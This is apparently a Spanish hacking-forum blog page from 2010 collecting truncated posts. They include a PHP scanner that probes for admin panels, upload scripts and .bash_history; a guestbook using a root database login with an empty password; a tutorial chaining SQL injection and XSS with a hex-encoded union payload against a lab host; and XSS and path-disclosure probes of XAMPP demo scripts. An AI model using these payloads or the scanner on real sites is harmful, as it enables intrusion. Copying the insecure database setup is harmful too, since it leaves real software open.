Publicado el 02/08/2010 12:08:00 en Programación Web.
Una bonita aplicación inspirada en un code corto que tenia l0ve,y espero que no piensen que copie el code,solo necesitaba saber mejor como se tenia que realizar y ahora ya aprendi,gracias por tus aportes l0ve.
Y espero que les guste.
<html>
<head>
<!-- Coded by KozmiC -->
<title>Path Way Finder - KozmiC's LabS</title>
<!-- Specially for l0ve that he is my inspiration and for DDLR users. [and you 1r15h XD] -->
</head>
<style>
body {
color: white;
background: black;
font-family: courier;
text-align: center;
}
.title {
color: white;
background: transparent;
font-size: 16pt;
border: 2px;
border-color: gray;
border-top-color: white;
border-bottom-color: white;
border-style: outset;
border-width: thin;
padding: 5px;
}
.use {
color: white;
background: transparent;
font-size: 12pt;
font-style: italic;
}
.textbox {
color: gray;
background: black;
font-size: 10pt;
}
.textbox:focus {
color: white;
background: black;
font-size: 10pt;
padding: 2px;
}
.buttom {
color: white;
background: black;
font-size: 8pt;
}
.buttom:focus {
color: gray;
background: black;
font-size: 10pt;
}
.permited {
color: white;
background: transparent;
font-size: 12pt;
font-style: bold;
}
.fobidden {
color: white;
background: transparent;
font-size: 10pt;
font-style: bold;
}
.notexist {
color: white;
background: transparent;
font-size: 8pt;
font-style: none;
}
.show {
color: white;
background: transparent;
font-size: 8pt;
font-style: none;
}
a:link,a:visited {
color: white;
background: transparent;
text-decoration: none;
font-style: bold;
}
a:hover {
color: black;
background: white;
font-style: italic;
}
</style>
<body>
<br><br>
<tt class='title'>Path Way Finder - KozmiC's LabS</tt>
<br><br>
<hr size='2' width='300'>
<br>
<?php
function search($x) {
$ways = array(
0 => "admin",
1 => "index.php",
2 => "index.html",
3 => "phpmyadmin/",
4 => ".bash_history",
5 => "upload.php",
6 => "upload.asp",
7 => "uploader.php",
8 => "uploader.asp",
9 => "phpinfo.php",
10 => "adm/",
11 => "admin/",
12 => "_admin/",
13 => "administrator/",
14 => "administracion/",
15 => "_administracion/",
16 => "~administracion/",
17 => "administer/",
18 => "upload/",
19 => "uploads/",
20 => "~adm/",
21 => "~admin/",
22 => "~administrator/",
23 => "... [/url][/trombi]
Continúa aquí...Comentarios: 28 | Leer comentariosPublicado el 02/08/2010 12:08:00 en Programación Web.
Bueno después de un tiempo pense que sería bueno traerles algo util,bueno es un simple Libro de Visitas programado en PHP+HTML y un poco de CSS,aunque lo que importa es que lo hize con cariño,porque adoro la programación y bueno como me inicie hace poco en PHP,pense que les gustaria ver más o menos que tal voy.
Datos a introducir en la base de datos:
CREATE TABLE 'blog'.'guestbook' (
'name' VARCHAR( 100 ) NOT NULL ,
'web' VARCHAR( 100 ) NOT NULL ,
'comment' VARCHAR( 150 ) NOT NULL
) ENGINE = MYISAM ;
Y aca lo que seria el guestbook :
<html>
<head>
<!-- Script by KozmiC -->
<title>GuestBook - KozmiC's LabS</title>
<!-- Greetz: Xzite,l0ve,MurdeR,d4rkdn4,1r15h and all DDLR users (L) -->
</head>
<style>
BODY {
cursor: crosshair ;
background: white ;
text-align: center ;
}
#input {
background: black ;
color: white ;
border: double ;
border-color: white ;
border-width: thick ;
}
#textbox {
background: black ;
color: white ;
border: double ;
border-color: white ;
border-width: thick ;
}
#comments {
text-align: center ;
width: 500px ;
color: black ;
background: transparent ;
border: double ;
border-color: gray ;
border-width: thick ;
}
a:link,a:visited {
color: blue ;
}
a:hover {
color: darkred ;
font-style: oblique ;
font-variant: small-caps ;
}
</style>
<body>
<p align="center"><hr size="2" width="500"></p>
<p align="center"><font size="7"><font color="darkred"><em>G</em></font>u<sup>e</sup>st<sub>B</sub>ook</font> - <font size="5"><font color="darkred">K</font>o<sup>z</sup>miC's</font> <font size="6"><font color="darkred">L</font>a<sub>b</sub>S</font></p><p align="right"><i><em>V</em>er<b>s</b>ion 1.0</i></p>
<p align="center"><hr size="3" width="400"><br><hr size="2" width="500"></p><br>
<?php
function connect() {
// --- Configuration --- //
$dbuser = "root";
$dbpass = "";
$dbhost = "localhost";
$dbname = "blog";
// - --- --------- --- - //
if (!($link=mysql_connect($dbhost,$dbuser,$dbpass))) {
echo "<font size='5'><tt>Error al conectar la base de datos.</tt></font>";
exit();
}
if (!mysql_select_db($dbname,$link)) {
echo "<font size='5'><tt>Error al seleccionar la base de datos.</tt></font>... [/url][/trombi]
Continúa aquí...Comentarios: 0 | Leer comentariosPublicado el 26/07/2010 12:07:00 en Seguridad.
SQL Injection + Cross Site Scripting = Fake
Bueno vuelvo con un nuevo aporte sobre un "video-demostración" de Xzite sobre SQLi+XSS.
Estube dandole vueltas al tema y me di cuenta que se puede manipular infomación de cierto modo,al tener una base de datos,un error en la base de datos y un script en php que saque de un "tutorial" o "demostración" de ka0x.
http://192.168.1.2/vuln/SQLi/users.php?id=1+and+1=2+union+select+1,2,3,4--
----------------------------
MySQL Injection TEST
D.O.M LABS
user_id: 1
username: 2
country: 4
----------------------------
Entones podemos leer el código fuente y copiar cierta parte para "imitar" el resulado.
<h2><center><u>MySQL Injection TEST<br>D.O.M LABS</u><br><br><font color='#FF0000'>user_id: </font>1<br><font color='#FF0000'>username: </font>2<br><font color='#FF0000'>country: </font>4<br>
Ahora toca ir modificando los resultados para nuestro favor,pero hay que tomar encuenta que los números que imprime es el 1,2 y 4.
Yo voy a imitar el código fuente desde el número 1,al final de la imitación colocare la etiqueta "<script>" para que oculte lo siguiente del código,asi parece un comentario.
666<br><font color='#FF0000'>username: </font>Diablo<br><font color='#FF0000'>country: </font>Hell<br><script>
Si ya han visto el video de Xzite,sabran que para pasar el código html "faked" deben pasarlo a hexagesimal y ante de imprimirlo en el link poner al principio "0x",sin comillas claro.
http://192.168.1.2/vuln/SQLi/users.php?id=1+and+1=2+union+select+0x3636363C62723E3C666F6E7420636F6C6F723D2723464630303030273E757365726E616D653A203C2F666F6E743E446961626C6F3C62723E3C666F6E7420636F6C6F723D2723464630303030273E636F756E7472793A203C2F666F6E743E48656C6C3C62723E3C7363726970743E,2,3,4--
Y les imprimiria:
----------------------------
MySQL Injection TEST
D.O.M LABS
user_id: 666
username: Diablo
country: Hell
----------------------------
Y bueno para la gente que le deje "paja" entrar en la consola,mysql ..etc
Les dejo un script bastante básico de conversión:
hex.pl
----------------------------
print "Enter string to encode:";
$str=<STDIN>;chomp $str;
$enc = encode($str); print "Hex Encoded value: 0x$enc\n";
sub encode{ #Sub to encode
@subvar=@_;
my $sqlstr =$subvar[0];
@ASCII = unpack("C*", $sqlstr);
foreach $line (@ASCII) {
$encoded = sprintf('%lx',$line);
$encoded_command .= $encoded;
}
return $encoded_command;
}
----------------------------
Bueno aqui finaliza mi "documentación" sobre SQL Injection y Cross Site Scripting dando a lugar un bonito fake,xploit o como deseen denominarlo.
Agradesco a ... [/trombi]
Continúa aquí...Comentarios: 2 | Leer comentariosPublicado el 26/07/2010 12:07:00 en Seguridad.
XAMPP for Linux
También conocido por LAMPP:
Linux Apache MySQL PHP Python/Perl
Los que no conoscan este "Pack",es muy similar a AppServ,EasyPHP y otros.
Después de haber leido un artículo en el blog de Murder,decidi analizar detenidamente algunos archivos del XAMPP||LAMPP,para obtener más errores de programación y ayudar a los que utilizen este "sistema" de web.
Dejo el link del Pack ,una vez descargado lo instalan en la carpeta que deseen,yo por ejemplo la tengo en la carpeta "/opt".
http://www.apachefriends.org/download.php?xampp-linux-1.7.3a.tar.gz
Instalando:
sudo tar xvfz xampp-linux-1.7.3a.tar.gz -C /opt
Este proceso puede tardar un poco,lo que sucede es que el archivo se extrae en la carpeta especificada,en este caso "/opt".
Y para iniciar el "sistema" de web,debemos introducir el siguiente comando en la consola:
/opt/lampp/lampp start
En el caso que estemos en la carpeta lampp:
./lampp start
Los anteriores comandos hay que introducirlos siendos un usuario con privilegios de root o con el comando "sudo" delante o "su -" .
Puede estar contentos de tener ya su propio servidor web,pero ¿Es seguro?
Primer error encontrado: http://localhost/xampp/biorhythm.php
Un demo-script de PHP+GD.
Observe que habia un formulario entonces decidi directamente pulsar "OK",y mi resultado fue un simple "FPD",gracias a el grande de l0ve conosco esta vulnerabilidad.
Siento apartarme un momento del documento pero recomiendo sinceramente el artículo que tiene l0ve sobre "Full Path Disclosure".
Un simple error,me daba bastante información para un futuro ataque.
Warning: checkdate() expects parameter 1 to be long, string given in /opt/lampp/htdocs/xampp/biorhythm.php on line 105
Como se puede mirar en el error me da la raiz donde esa intalado el XAMPP.
Tambien podemos provocar un error dejando corchetes abierto,me refiero a que el array no tendria valor.
http://localhost/xampp/biorhythm.php?birthdate[]=
Segundo error encontrado: http://localhost/xampp/iart.php
Otro demo-script de PHP+GD+FreeType.
Siempre que veo un formulario donde se pueda ingresar texto,veo un XSS,SQLi e incluso RFI o LFI.
Pueden tomarme como un loco,pero las posibilidades de que encuentre un RFI o LFI en un formulario parecen nulas pero las hay,el ser humano es uno de los animales que tiene la gran "habilidad" de equivocarse mucho.
Volviendo al tema decidi hacer una comprobación de SQLi,y ese intento fue fallido no se toca ningun base de datos y bueno decidí probar un XSS,injecte un código simple HTML:
<h1>TEST-XSS</h1>
Nada,valla pero no voy a abandonar,probemos rompiendo el orden del código fuente si es que se puede decir asi.
"><h1>TEST-XSS</h1>
Bien,mis posibilidades de haber e... [/trombi]
Continúa aquí...Comentarios: 0 | Leer comentariosPublicado el 22/06/2010 12:06:00 en Off Topic.
Despues de un tiempo de reflexion,decidi no huir de mis miedos y afrontarlos y ahora es cuando los señores del gobierno deben tener en cuenta que no voy a ser un enemigo,pero tampoco un aliado.
Espero contribuir en todo lo que pueda en dios de la red y espero que Xzite no tenga más discusiones por que con problemas y peleas no se soluciona nada,ahora no hablo como un informático,si no como un amigo de la red.
Atentamente. KozmiC.
Comentarios: 1 | Leer comentarios
![[x]](http://www.diosdelared.com/images/add.ico)
![[x]](http://ddlr.servepics.com/rd.php?go=http://img40.imageshack.us/img40/755/kozmic.png "kozmic")
Nick: kozmic
